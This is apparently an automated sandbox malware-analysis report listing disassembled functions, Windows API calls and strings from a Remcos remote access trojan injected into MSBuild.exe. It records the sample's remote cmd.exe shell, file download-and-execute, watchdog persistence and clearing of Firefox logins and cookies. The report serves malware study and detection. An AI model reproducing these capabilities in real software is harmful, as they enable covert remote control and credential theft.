                                                • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 480 442554-442560 call 447973 483 442582-44258e call 4425d9 ExitProcess 480->483 484 442562-442570 GetPEB 480->484 484->483 485 442572-44257c GetCurrentProcess TerminateProcess 484->485 485->483
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                • ExitProcess.KERNEL32 ref: 0044258E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 0040D790
                                                  • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                • API String ID: 2830904901-1887556364
                                                • Opcode ID: ec0c27093ae2b25acbc0dbe248f5bcf65095a0b92f5ab25aac08858853d55201
                                                • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                • Opcode Fuzzy Hash: ec0c27093ae2b25acbc0dbe248f5bcf65095a0b92f5ab25aac08858853d55201
                                                • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                Control-flow Graph

                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                • CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                • closesocket.WS2_32(?), ref: 0040481F
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                • String ID:
                                                • API String ID: 3658366068-0
                                                • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 464 447210-447224 465 447226-44722f 464->465 466 447231-44724c LoadLibraryExW 464->466 467 447288-44728a 465->467 468 447275-44727b 466->468 469 44724e-447257 GetLastError 466->469 472 447284 468->472 473 44727d-44727e FreeLibrary 468->473 470 447266 469->470 471 447259-447264 LoadLibraryExW 469->471 474 447268-44726a 470->474 471->474 475 447286-447287 472->475 473->472 474->468 476 44726c-447273 474->476 475->467 476->475
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8

                                                Control-flow Graph (function at 40bed7; interactive graph not rendered)
                                                APIs
                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                • GetLastError.KERNEL32 ref: 0040BEF1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateErrorLastMutex
                                                • String ID: (CG
                                                • API String ID: 1925916568-4210230975
                                                • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                Control-flow Graph (function at 447174; interactive graph not rendered)
                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004471D4
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 2279764990-0
                                                • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9

                                                Control-flow Graph (function at 43360d; interactive graph not rendered)
                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID:
                                                • API String ID: 3476068407-0
                                                • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D

                                                Control-flow Graph (function at 44eeb5; interactive graph not rendered)
                                                APIs
                                                  • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                • _free.LIBCMT ref: 0044EF21
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                • Instruction ID: 91765bf56145836b352927287b0900a7be963fc320189fecf9c5ab0789588b10
                                                • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                • Instruction Fuzzy Hash: 2D01DB771043056BF321CF66984595AFBD9FB8A370F65051EE59453280EB34A806C778

                                                Control-flow Graph (function at 448706; interactive graph not rendered)
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED

                                                Control-flow Graph (function at 446aff; interactive graph not rendered)
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                APIs
                                                • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                  • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                  • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                • Sleep.KERNEL32(000007D0), ref: 00407976
                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                  • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                • API String ID: 2918587301-599666313
                                                • Opcode ID: 837214dce98ca1b2b2073b1697b820e369ac81518af4a92b317c91ee19e5831a
                                                • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                • Opcode Fuzzy Hash: 837214dce98ca1b2b2073b1697b820e369ac81518af4a92b317c91ee19e5831a
                                                • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0040508E
                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                • __Init_thread_footer.LIBCMT ref: 004050CB
                                                • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                • CloseHandle.KERNEL32 ref: 004053CD
                                                • CloseHandle.KERNEL32 ref: 004053D5
                                                • CloseHandle.KERNEL32 ref: 004053E7
                                                • CloseHandle.KERNEL32 ref: 004053EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                • API String ID: 3815868655-81343324
                                                • Opcode ID: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                • Opcode Fuzzy Hash: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                  • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                  • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                  • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                • API String ID: 65172268-860466531
                                                • Opcode ID: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                • Opcode Fuzzy Hash: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                • FindClose.KERNEL32(00000000), ref: 0040B517
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$CloseFile$FirstNext
                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                • API String ID: 1164774033-3681987949
                                                • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Close$File$FirstNext
                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                • API String ID: 3527384056-432212279
                                                • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
